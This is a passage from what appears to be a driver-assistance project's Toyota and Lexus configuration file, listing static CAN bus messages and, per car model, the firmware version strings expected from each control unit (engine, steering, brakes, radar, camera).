  (0x283, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 0,   3, b'\x00\x00\x00\x00\x00\x00\x8c'),
  (0x2E6, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH), 0,   3, b'\xff\xf8\x00\x08\x7f\xe0\x00\x4e'),
  (0x2E7, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH), 0,   3, b'\xa8\x9c\x31\x9c\x00\x00\x00\x02'),
  (0x33E, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH), 0,  20, b'\x0f\xff\x26\x40\x00\x1f\x00'),
  (0x344, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 0,   5, b'\x00\x00\x01\x00\x00\x00\x00\x50'),
  (0x365, (CAR.PRIUS, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.HIGHLANDERH), 0,  20, b'\x00\x00\x00\x80\x03\x00\x08'),
  (0x365, (CAR.RAV4, CAR.RAV4H, CAR.COROLLA, CAR.HIGHLANDER, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 0,  20, b'\x00\x00\x00\x80\xfc\x00\x08'),
  (0x366, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.HIGHLANDERH), 0,  20, b'\x00\x00\x4d\x82\x40\x02\x00'),
  (0x366, (CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDER, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 0,  20, b'\x00\x72\x07\xff\x09\xfe\x00'),
  (0x470, (CAR.PRIUS, CAR.LEXUS_RXH), 1, 100, b'\x00\x00\x02\x7a'),
  (0x470, (CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.RAV4H, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.PRIUS_V), 1, 100, b'\x00\x00\x01\x79'),
  (0x4CB, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDERH, CAR.HIGHLANDER, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 0, 100, b'\x0c\x00\x00\x00\x00\x00\x00\x00'),
]
FW_VERSIONS = {
CAR.AVALON: {
(Ecu.esp, 0x7b0, None): [
b'F152607060\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881510701300\x00\x00\x00\x00',
b'881510705100\x00\x00\x00\x00',
b'881510705200\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B41051\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0230721100\x00\x00\x00\x00\x00\x00\x00\x00A0C01000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230721200\x00\x00\x00\x00\x00\x00\x00\x00A0C01000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702000\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0701100\x00\x00\x00\x00',
b'8646F0703000\x00\x00\x00\x00',
],
},
CAR.AVALON_2019: {
(Ecu.esp, 0x7b0, None): [
b'F152607140\x00\x00\x00\x00\x00\x00',
b'F152607171\x00\x00\x00\x00\x00\x00',
b'F152607110\x00\x00\x00\x00\x00\x00',
b'F152607180\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881510703200\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B41080\x00\x00\x00\x00\x00\x00',
b'8965B07010\x00\x00\x00\x00\x00\x00',
b'8965B41090\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x01896630725200\x00\x00\x00\x00',
b'\x01896630725300\x00\x00\x00\x00',
b'\x01896630735100\x00\x00\x00\x00',
b'\x01896630738000\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0702100\x00\x00\x00\x00',
],
},
CAR.AVALONH_2019: {
(Ecu.esp, 0x7b0, None): [
b'F152641040\x00\x00\x00\x00\x00\x00',
b'F152641061\x00\x00\x00\x00\x00\x00',
b'F152641050\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881510704200\x00\x00\x00\x00',
b'881514107100\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B07010\x00\x00\x00\x00\x00\x00',
b'8965B41090\x00\x00\x00\x00\x00\x00',
b'8965B41070\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x02896630724000\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x02896630737000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x02896630728000\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0702100\x00\x00\x00\x00',
],
},
CAR.AVALON_TSS2: {
(Ecu.esp, 0x7b0, None): [
b'\x01F152607280\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B41110\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x01896630742000\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F6201200\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4104100\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
],
},
CAR.CAMRY: {
(Ecu.engine, 0x700, None): [
b'\x018966306L3100\x00\x00\x00\x00',
b'\x018966306L4200\x00\x00\x00\x00',
b'\x018966306L5200\x00\x00\x00\x00',
b'\x018966306P8000\x00\x00\x00\x00',
b'\x018966306Q3100\x00\x00\x00\x00',
b'\x018966306Q4000\x00\x00\x00\x00',
b'\x018966306Q4100\x00\x00\x00\x00',
b'\x018966306Q4200\x00\x00\x00\x00',
b'\x018966333Q9200\x00\x00\x00\x00',
b'\x018966333P3100\x00\x00\x00\x00',
b'\x018966333P3200\x00\x00\x00\x00',
b'\x018966333P4200\x00\x00\x00\x00',
b'\x018966333P4300\x00\x00\x00\x00',
b'\x018966333P4400\x00\x00\x00\x00',
b'\x018966333P4500\x00\x00\x00\x00',
b'\x018966333P4700\x00\x00\x00\x00',
b'\x018966333P4900\x00\x00\x00\x00',
b'\x018966333Q6000\x00\x00\x00\x00',
b'\x018966333Q6200\x00\x00\x00\x00',
b'\x018966333Q6300\x00\x00\x00\x00',
b'\x018966333W6000\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x02333P1100\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'8821F0601200 ',
b'8821F0601300 ',
b'8821F0602000 ',
b'8821F0603300 ',
b'8821F0604100 ',
b'8821F0605200 ',
b'8821F0607200 ',
b'8821F0608000 ',
b'8821F0608200 ',
b'8821F0609100 ',
],
(Ecu.esp, 0x7b0, None): [
b'F152606210\x00\x00\x00\x00\x00\x00',
b'F152606230\x00\x00\x00\x00\x00\x00',
b'F152606270\x00\x00\x00\x00\x00\x00',
b'F152606290\x00\x00\x00\x00\x00\x00',
b'F152606410\x00\x00\x00\x00\x00\x00',
b'F152633540\x00\x00\x00\x00\x00\x00',
b'F152633A10\x00\x00\x00\x00\x00\x00',
b'F152633A20\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B33540\x00\x00\x00\x00\x00\x00',
b'8965B33542\x00\x00\x00\x00\x00\x00',
b'8965B33580\x00\x00\x00\x00\x00\x00',
b'8965B33581\x00\x00\x00\x00\x00\x00',
b'8965B33621\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [ # Same as 0x791
b'8821F0601200 ',
b'8821F0601300 ',
b'8821F0602000 ',
b'8821F0603300 ',
b'8821F0604100 ',
b'8821F0605200 ',
b'8821F0607200 ',
b'8821F0608000 ',
b'8821F0608200 ',
b'8821F0609100 ',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0601200 ',
b'8646F0601300 ',
b'8646F0601400 ',
b'8646F0603400 ',
b'8646F0604100 ',
b'8646F0605000 ',
b'8646F0606000 ',
b'8646F0606100 ',
b'8646F0607100 ',
],
},
CAR.CAMRYH: {
(Ecu.engine, 0x700, None): [
b'\x018966306Q6000\x00\x00\x00\x00',
b'\x018966333N1100\x00\x00\x00\x00',
b'\x018966333N4300\x00\x00\x00\x00',
b'\x018966333X0000\x00\x00\x00\x00',
b'\x018966333X4000\x00\x00\x00\x00',
b'\x01896633T16000\x00\x00\x00\x00',
b'\x028966306B2100\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306B2300\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306B2500\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306N8100\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306N8200\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306N8300\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306N8400\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306R5000\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306R5000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966306R6000\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306R6000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966306S0000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966306S0100\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966306S1100\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152633214\x00\x00\x00\x00\x00\x00',
b'F152633660\x00\x00\x00\x00\x00\x00',
b'F152633712\x00\x00\x00\x00\x00\x00',
b'F152633713\x00\x00\x00\x00\x00\x00',
b'F152633B51\x00\x00\x00\x00\x00\x00',
b'F152633B60\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'8821F0601200 ',
b'8821F0601300 ',
b'8821F0603400 ',
b'8821F0604000 ',
b'8821F0604100 ',
b'8821F0604200 ',
b'8821F0605200 ',
b'8821F0606200 ',
b'8821F0607200 ',
b'8821F0608000 ',
b'8821F0608200 ',
b'8821F0609000 ',
b'8821F0609100 ',
],
(Ecu.eps, 0x7a1, None): [
b'8965B33540\x00\x00\x00\x00\x00\x00',
b'8965B33542\x00\x00\x00\x00\x00\x00',
b'8965B33550\x00\x00\x00\x00\x00\x00',
b'8965B33551\x00\x00\x00\x00\x00\x00',
b'8965B33580\x00\x00\x00\x00\x00\x00',
b'8965B33581\x00\x00\x00\x00\x00\x00',
b'8965B33611\x00\x00\x00\x00\x00\x00',
b'8965B33621\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [ # Same as 0x791
b'8821F0601200 ',
b'8821F0601300 ',
b'8821F0603400 ',
b'8821F0604000 ',
b'8821F0604100 ',
b'8821F0604200 ',
b'8821F0605200 ',
b'8821F0606200 ',
b'8821F0607200 ',
b'8821F0608000 ',
b'8821F0608200 ',
b'8821F0609000 ',
b'8821F0609100 ',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0601200 ',
b'8646F0601300 ',
b'8646F0601400 ',
b'8646F0603400 ',
b'8646F0603500 ',
b'8646F0604100 ',
b'8646F0605000 ',
b'8646F0606000 ',
b'8646F0606100 ',
b'8646F0607000 ',
b'8646F0607100 ',
],
},
CAR.CAMRY_TSS2: {
(Ecu.eps, 0x7a1, None): [
b'8965B33630\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F152606370\x00\x00\x00\x00\x00\x00',
b'\x01F152606390\x00\x00\x00\x00\x00\x00',
b'\x01F152606400\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x018966306Q5000\x00\x00\x00\x00',
b'\x018966306T3100\x00\x00\x00\x00',
b'\x018966306T3200\x00\x00\x00\x00',
b'\x018966306T4000\x00\x00\x00\x00',
b'\x018966306T4100\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F6201200\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F0602100\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
b'\x028646F0602200\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
b'\x028646F3305200\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
b'\x028646F3305300\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
],
},
CAR.CAMRYH_TSS2: {
(Ecu.eps, 0x7a1, None): [
b'8965B33630\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152633D00\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x018966306Q6000\x00\x00\x00\x00',
b'\x018966306Q7000\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 15): [
b'\x018821F6201200\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 109): [
b'\x028646F3305200\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
b'\x028646F3305300\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
],
},
CAR.CHR: {
(Ecu.engine, 0x700, None): [
b'\x01896631021100\x00\x00\x00\x00',
b'\x01896631017100\x00\x00\x00\x00',
b'\x01896631017200\x00\x00\x00\x00',
b'\x0189663F413100\x00\x00\x00\x00',
b'\x0189663F414100\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'8821F0W01000 ',
b'8821F0W01100 ',
b'8821FF401600 ',
b'8821FF404000 ',
b'8821FF404100 ',
b'8821FF405100 ',
b'8821FF406000 ',
b'8821FF407100 ',
],
(Ecu.esp, 0x7b0, None): [
b'F152610020\x00\x00\x00\x00\x00\x00',
b'F152610153\x00\x00\x00\x00\x00\x00',
b'F152610210\x00\x00\x00\x00\x00\x00',
b'F1526F4034\x00\x00\x00\x00\x00\x00',
b'F1526F4044\x00\x00\x00\x00\x00\x00',
b'F1526F4073\x00\x00\x00\x00\x00\x00',
b'F1526F4121\x00\x00\x00\x00\x00\x00',
b'F1526F4122\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B10011\x00\x00\x00\x00\x00\x00',
b'8965B10040\x00\x00\x00\x00\x00\x00',
b'8965B10070\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0331024000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203202\x00\x00\x00\x00',
b'\x0331024000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203302\x00\x00\x00\x00',
b'\x0331036000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203302\x00\x00\x00\x00',
b'\x033F401100\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203102\x00\x00\x00\x00',
b'\x033F401200\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203202\x00\x00\x00\x00',
b'\x033F424000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203202\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F0W01000 ',
b'8821FF401600 ',
b'8821FF404000 ',
b'8821FF404100 ',
b'8821FF405100 ',
b'8821FF406000 ',
b'8821FF407100 ',
b'8821F0W01100 ',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646FF401700 ',
b'8646FF401800 ',
b'8646FF404000 ',
b'8646FF406000 ',
b'8646FF407000 ',
],
},
CAR.CHRH: {
(Ecu.engine, 0x700, None): [
b'\x0289663F405100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896631013200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x0289663F405000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x0289663F418000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x0289663F423000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x0289663F431000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x0189663F438000\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152610012\x00\x00\x00\x00\x00\x00',
b'F152610013\x00\x00\x00\x00\x00\x00',
b'F152610014\x00\x00\x00\x00\x00\x00',
b'F152610040\x00\x00\x00\x00\x00\x00',
b'F152610190\x00\x00\x00\x00\x00\x00',
b'F152610200\x00\x00\x00\x00\x00\x00',
b'F152610230\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'8821F0W01000 ',
b'8821FF402300 ',
b'8821FF402400 ',
b'8821FF404000 ',
b'8821FF404100 ',
b'8821FF405000 ',
b'8821FF406000 ',
b'8821FF407100 ',
],
(Ecu.eps, 0x7a1, None): [
b'8965B10011\x00\x00\x00\x00\x00\x00',
b'8965B10020\x00\x00\x00\x00\x00\x00',
b'8965B10040\x00\x00\x00\x00\x00\x00',
b'8965B10050\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F0W01000 ',
b'8821FF402300 ',
b'8821FF402400 ',
b'8821FF404000 ',
b'8821FF404100 ',
b'8821FF405000 ',
b'8821FF406000 ',
b'8821FF407100 ',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646FF401700 ',
b'8646FF402100 ',
b'8646FF404000 ',
b'8646FF406000 ',
b'8646FF407000 ',
],
},
CAR.COROLLA: {
(Ecu.engine, 0x7e0, None): [
b'\x0230ZC2000\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC2100\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC2200\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC2300\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC3000\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC3100\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC3200\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC3300\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0330ZC1200\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00895231203202\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881510201100\x00\x00\x00\x00',
b'881510201200\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152602190\x00\x00\x00\x00\x00\x00',
b'F152602191\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B02181\x00\x00\x00\x00\x00\x00',
b'8965B02191\x00\x00\x00\x00\x00\x00',
b'8965B48150\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0201101\x00\x00\x00\x00',
b'8646F0201200\x00\x00\x00\x00',
],
},
CAR.COROLLA_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896630ZG2000\x00\x00\x00\x00',
b'\x01896630ZG5000\x00\x00\x00\x00',
b'\x01896630ZG5100\x00\x00\x00\x00',
b'\x01896630ZG5200\x00\x00\x00\x00',
b'\x01896630ZG5300\x00\x00\x00\x00',
b'\x01896630ZP1000\x00\x00\x00\x00',
b'\x01896630ZP2000\x00\x00\x00\x00',
b'\x01896630ZQ5000\x00\x00\x00\x00',
b'\x018966312L8000\x00\x00\x00\x00',
b'\x018966312M0000\x00\x00\x00\x00',
b'\x018966312M9000\x00\x00\x00\x00',
b'\x018966312P9000\x00\x00\x00\x00',
b'\x018966312P9100\x00\x00\x00\x00',
b'\x018966312P9200\x00\x00\x00\x00',
b'\x018966312P9300\x00\x00\x00\x00',
b'\x018966312Q2300\x00\x00\x00\x00',
b'\x018966312Q8000\x00\x00\x00\x00',
b'\x018966312R0000\x00\x00\x00\x00',
b'\x018966312R0100\x00\x00\x00\x00',
b'\x018966312R1000\x00\x00\x00\x00',
b'\x018966312R1100\x00\x00\x00\x00',
b'\x018966312R3100\x00\x00\x00\x00',
b'\x018966312S5000\x00\x00\x00\x00',
b'\x018966312S7000\x00\x00\x00\x00',
b'\x018966312W3000\x00\x00\x00\x00',
b'\x018966312W9000\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0230A10000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230A11000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZN4000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x03312K7000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203402\x00\x00\x00\x00',
b'\x03312M3000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203402\x00\x00\x00\x00',
b'\x03312N6000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203202\x00\x00\x00\x00',
b'\x03312N6000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203302\x00\x00\x00\x00',
b'\x03312N6000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203402\x00\x00\x00\x00',
b'\x03312N6100\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203302\x00\x00\x00\x00',
b'\x03312N6100\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203402\x00\x00\x00\x00',
b'\x02312K4000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'\x018965B12350\x00\x00\x00\x00\x00\x00',
b'\x018965B12470\x00\x00\x00\x00\x00\x00',
b'\x018965B12490\x00\x00\x00\x00\x00\x00',
b'\x018965B12500\x00\x00\x00\x00\x00\x00',
b'\x018965B12520\x00\x00\x00\x00\x00\x00',
b'\x018965B12530\x00\x00\x00\x00\x00\x00',
b'\x018965B1255000\x00\x00\x00\x00',
b'8965B12361\x00\x00\x00\x00\x00\x00',
b'8965B16011\x00\x00\x00\x00\x00\x00',
b'\x018965B12510\x00\x00\x00\x00\x00\x00'
],
(Ecu.esp, 0x7b0, None): [
b'\x01F152602280\x00\x00\x00\x00\x00\x00',
b'\x01F152602560\x00\x00\x00\x00\x00\x00',
b'\x01F152602590\x00\x00\x00\x00\x00\x00',
b'\x01F152602650\x00\x00\x00\x00\x00\x00',
b"\x01F15260A010\x00\x00\x00\x00\x00\x00",
b'\x01F15260A050\x00\x00\x00\x00\x00\x00',
b'\x01F152612641\x00\x00\x00\x00\x00\x00',
b'\x01F152612651\x00\x00\x00\x00\x00\x00',
b'\x01F152612B10\x00\x00\x00\x00\x00\x00',
b'\x01F152612B51\x00\x00\x00\x00\x00\x00',
b'\x01F152612B60\x00\x00\x00\x00\x00\x00',
b'\x01F152612B61\x00\x00\x00\x00\x00\x00',
b'\x01F152612B62\x00\x00\x00\x00\x00\x00',
b'\x01F152612B71\x00\x00\x00\x00\x00\x00',
b'\x01F152612B81\x00\x00\x00\x00\x00\x00',
b'\x01F152612B90\x00\x00\x00\x00\x00\x00',
b'\x01F152612C00\x00\x00\x00\x00\x00\x00',
b'F152602191\x00\x00\x00\x00\x00\x00',
b'\x01F152612862\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F12010D0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F1201100\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F1201200\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F1201300\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F1201400\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
b'\x028646F1202000\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F1202100\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F1202200\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
b'\x028646F1601100\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
],
},
CAR.COROLLAH_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896630ZJ1000\x00\x00\x00\x00',
b'\x01896630ZU8000\x00\x00\x00\x00',
b'\x01896637621000\x00\x00\x00\x00',
b'\x01896637624000\x00\x00\x00\x00',
b'\x01896637626000\x00\x00\x00\x00',
b'\x01896637648000\x00\x00\x00\x00',
b'\x01896637643000\x00\x00\x00\x00',
b'\x02896630ZJ5000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896630ZN8000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896630ZQ3000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896630ZR2000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896630ZT8000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896630ZT9000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966312K6000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966312L0000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966312Q3000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966312Q4000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x038966312L7000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF1205001\x00\x00\x00\x00',
b'\x038966312N1000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF1203001\x00\x00\x00\x00',
b'\x038966312T3000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF1205001\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B12361\x00\x00\x00\x00\x00\x00',
b'8965B12451\x00\x00\x00\x00\x00\x00',
b'8965B76012\x00\x00\x00\x00\x00\x00',
b'8965B76050\x00\x00\x00\x00\x00\x00',
b'\x018965B12350\x00\x00\x00\x00\x00\x00',
b'\x018965B12470\x00\x00\x00\x00\x00\x00',
b'\x018965B12490\x00\x00\x00\x00\x00\x00',
b'\x018965B12500\x00\x00\x00\x00\x00\x00',
b'\x018965B12510\x00\x00\x00\x00\x00\x00',
b'\x018965B12520\x00\x00\x00\x00\x00\x00',
b'\x018965B12530\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152612590\x00\x00\x00\x00\x00\x00',
b'F152612691\x00\x00\x00\x00\x00\x00',
b'F152612692\x00\x00\x00\x00\x00\x00',
b'F152612700\x00\x00\x00\x00\x00\x00',
b'F152612710\x00\x00\x00\x00\x00\x00',
b'F152612790\x00\x00\x00\x00\x00\x00',
